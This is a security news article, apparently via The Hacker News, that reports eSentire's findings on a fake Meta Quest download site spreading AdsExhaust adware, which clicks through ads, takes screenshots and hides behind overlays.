If you are looking for the Meta Quest app for Windows, be careful because experts have found a malicious parody version that infects endpoints with adware and steals information from malware.
Researchers from eSentire revealed that they recently observed a fake Meta Quest website, at oculus-app(.)com – a site, seemingly identical to the authentic version, that allows visitors to download the app, but bundled with malware.
The site has a solid ranking in search engines, thanks to various SEO poisoning techniques, the researchers said. As a result, users searching for Meta Quest are likely to end up on the malicious site instead. Once they download the app and run the installer, they also get a Windows batch script that retrieves a second batch script form. the command-and-control (C2) server that ultimately retrieves a final batch file.
View advertisements
The malware first checks if Microsoft’s Edge browser is running and checks when the user last interacted with the browser. When the endpoint is inactive for nine minutes, the script opens new tabs, navigates to certain URLs, randomly scrolls up and down the page, and injects clicks. All this results in advertising revenue for the operators of the malware.
Additionally, the adware, called AdsExhaust, could take screenshots and simulate keystrokes, it was said.
“The adware is capable of exfiltrating screenshots from infected devices and communicating with browsers using simulated keystrokes,” eSentire said. “These features allow automatic clicking through of advertisements or browser redirection to specific URLs, thus generating revenue for the adware operators.”
AdsExhaus is also relatively good at hiding, the researchers concluded. If it detects mouse movements (meaning a user is sitting at the computer), it closes the open browser and creates an overlay to hide its actions.
“AdsExhaust is an adware threat that cleverly manipulates user interactions and conceals its activities to generate illicit revenue,” the researchers concluded. “It includes multiple techniques such as retrieving malicious code from the C2 server, simulating keystrokes, taking screenshots, and creating overlays to remain undetected while performing malicious activities.”
Through The HackerNews